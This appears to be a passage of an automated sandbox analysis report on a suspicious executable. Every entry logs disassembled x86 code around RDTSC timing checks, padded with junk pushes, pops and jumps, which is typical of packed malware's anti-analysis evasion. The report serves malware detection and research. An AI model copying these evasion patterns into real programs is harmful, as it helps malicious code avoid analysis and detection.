Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1604949 second address: 160494D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 160494D second address: 1604986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d jmp 00007F9665249A09h 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F96652499FBh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1604986 second address: 160498A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 160498A second address: 16049A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9665249A02h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16049A9 second address: 16049D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665989DAFh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [ebp+12A0372Fh] 0x00000014 mov edx, ebx 0x00000016 lea ebx, dword ptr [ebp+12B92404h] 0x0000001c cld 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16049D6 second address: 16049E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F96652499FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16245CB second address: 16245D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1622A4A second address: 1622A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1622A50 second address: 1622A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 162335A second address: 1623378 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F96652499F6h 0x00000008 jno 00007F96652499F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F96652499F6h 0x00000018 ja 00007F96652499F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1623378 second address: 1623397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16234E5 second address: 16234E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16199D9 second address: 1619A0B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9665989DBDh 0x00000008 jmp 00007F9665989DB7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9665989DADh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1619A0B second address: 1619A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1619A0F second address: 1619A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1619A15 second address: 1619A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15FC5AA second address: 15FC5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1624157 second address: 162415B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1628B4B second address: 1628B72 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9665989DACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9665989DACh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16272C2 second address: 16272CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16272CB second address: 16272D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1628E0E second address: 1628E35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9665249A07h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F96652499FEh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 162B26F second address: 162B2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9665989DA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007F9665989DB4h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F9665989DA6h 0x0000001c jmp 00007F9665989DB4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 162B2AE second address: 162B2C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F96652499F6h 0x0000000d pop esi 0x0000000e jl 00007F9665249A02h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 162B2C4 second address: 162B2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 162C702 second address: 162C711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96652499FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 162C711 second address: 162C716 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16312D9 second address: 16312F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F9665249A01h 0x0000000c jmp 00007F96652499FBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15F72F7 second address: 15F72FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1630762 second address: 1630780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F96652499F6h 0x00000013 jng 00007F96652499F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1630780 second address: 1630784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1630784 second address: 16307B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F96652499FCh 0x0000000e popad 0x0000000f pushad 0x00000010 jl 00007F96652499FEh 0x00000016 jng 00007F96652499F6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f jbe 00007F96652499F6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16307B1 second address: 16307C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F9665989DA6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1634853 second address: 1634858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1634858 second address: 1634880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 ja 00007F9665989DA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1634880 second address: 1634885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1634938 second address: 1634999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F9665989DB2h 0x0000000e jbe 00007F9665989DA6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F9665989DB2h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push esi 0x00000024 jno 00007F9665989DACh 0x0000002a pop esi 0x0000002b mov eax, dword ptr [eax] 0x0000002d push esi 0x0000002e push edi 0x0000002f pushad 0x00000030 popad 0x00000031 pop edi 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jbe 00007F9665989DA8h 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1634D15 second address: 1634D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1634E03 second address: 1634E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1635739 second address: 163573F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1635869 second address: 1635873 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9665989DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1635AD2 second address: 1635AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163910B second address: 1639111 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15ED19C second address: 15ED1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15ED1A0 second address: 15ED1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F9665989DA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15ED1B0 second address: 15ED1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15ED1B4 second address: 15ED1BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16396F0 second address: 16396FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16396FE second address: 163970E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163A806 second address: 163A86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F96652499F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F96652499F8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F96652499FCh 0x0000002e push 00000000h 0x00000030 call 00007F96652499FEh 0x00000035 pop edi 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F9665249A09h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163A86A second address: 163A88B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b js 00007F9665989DACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163B374 second address: 163B3EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e mov si, di 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F96652499F8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F96652499F8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+12A03893h] 0x00000050 xchg eax, ebx 0x00000051 jmp 00007F96652499FDh 0x00000056 push eax 0x00000057 jo 00007F9665249A00h 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163B0E1 second address: 163B0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163C946 second address: 163C94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163C6A1 second address: 163C6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163C6A5 second address: 163C6A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163C6A9 second address: 163C6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163E02F second address: 163E042 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F96652499F8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163FBFC second address: 163FC0B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9665989DAAh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163FC0B second address: 163FC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F9665249A06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F96652499FEh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163FC36 second address: 163FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F9665989DA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163FC44 second address: 163FC4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 163FC4C second address: 163FC5C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9665989DB2h 0x00000008 jo 00007F9665989DA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15F2172 second address: 15F2176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15F2176 second address: 15F217C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15F217C second address: 15F2180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16445C4 second address: 16445CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1643810 second address: 1643814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1644791 second address: 16447AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9665989DACh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16466F4 second address: 1646704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F96652499F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1644883 second address: 1644887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1646704 second address: 1646708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1644887 second address: 164488B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1646708 second address: 164670E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16477BE second address: 16477C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16477C2 second address: 16477DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F96652499FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1648767 second address: 164876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1647A37 second address: 1647A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 164876B second address: 1648786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1647A54 second address: 1647A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jc 00007F96652499F6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9665249A06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 164A765 second address: 164A77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 164890D second address: 1648913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 164A77C second address: 164A780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1648913 second address: 1648921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1648921 second address: 1648925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164ACB8 second address: 164ACBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1648925 second address: 1648929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164ACBC second address: 164ACE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96652499F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665249A04h 0x00000013 rdtsc
